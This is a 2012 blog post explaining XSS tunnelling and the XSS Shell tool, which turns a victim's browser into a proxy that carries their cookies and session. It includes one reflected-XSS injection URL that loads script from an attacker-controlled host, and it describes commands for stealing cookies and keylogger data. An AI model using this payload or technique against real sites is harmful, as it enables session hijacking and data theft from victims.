Thursday, November 22, 2012

XSS TUNNELLING

  • What is XSS Tunnelling?
XSS Tunnelling is the tunnelling of HTTP traffic through an XSS Channel, so that virtually any application that supports an HTTP proxy can be driven over it. XSS Tunnel is a standard HTTP proxy that runs on the attacker's system. Any tool configured to use that proxy has its traffic tunnelled through the active XSS Channel on the XSS Shell server: the XSS Tunnel transparently converts each proxied request into an XSS Shell command, and reassembles the reply coming back over the channel into a valid HTTP response for the tool. Because the requests are ultimately issued by the victim's browser inside the XSS'd origin, they carry the victim's cookies and session, which is what makes the tunnel useful to an attacker.


  • XSS Channel:
An XSS Channel is an interactive communication channel between two systems
which is opened by an XSS attack. At a technical level, it is a type of AJAX
application which can obtain commands, send responses back and is able to talk
cross-domain.

  • XSS Shell:
The XSS Shell is a tool that can be used to set up an XSS Channel between a victim
and an attacker, so that the attacker can control the victim's browser by sending it
commands. This communication is bi-directional.

Download XSS Shell from here.

  • Example:
To get the XSS Shell to work an attacker needs to inject a reference to the XSS Shell's
JavaScript by way of an XSS attack. The attacker is then able to control the victim's
browser. From this point on the attacker can see requests and responses, and is able to
instruct the victim's browser to carry out requests, etc.


A reflected injection of the kind used, where xssshellserver is the attacker-controlled host running XSS Shell:

http://example.com/?q="><script src="http://xssshellserver/xssshell.asp"></script>

  • How Does XSS Shell Work?
Firstly, the server-side part of the XSS Shell coordinates the XSS Channel between an
attacker and the victim. It is a server-side application and requires ASP on an IIS
web server. It uses an MS Access database as storage.



The second part of the tool is client-side and written in JavaScript. This loads in the
victim’s browser and is responsible for the receiving and processing of commands
together with providing the channel between the victim and the attacker. This code
was tested under Firefox, IE6 and IE7.

The final part of the XSS Shell is the administration interface. From this interface an
attacker can send new commands and receive the responses from the victims' browsers
instantly. Again it is ASP and requires IIS.


1. An attacker infects a website with a persistent or reflected (temporary) XSS
attack that loads the remote XSS Shell JavaScript.

2. The victim follows a link or visits the page, and the JavaScript executes within
that domain.

3. The victim's browser begins to perform periodic requests to the XSS Shell
server, looking for new commands.

4. When the victim's browser receives a new command (such as Get Cookies,
Execute custom JavaScript, Get Key logger Data, etc.) it processes the command and
returns the results to the XSS Shell server.

5. The attacker can push new commands to the victims' browsers and view the
results from the XSS Shell administration interface.


Happy Hacking...Enjoy...


For educational purpose only...Do not misuse it...
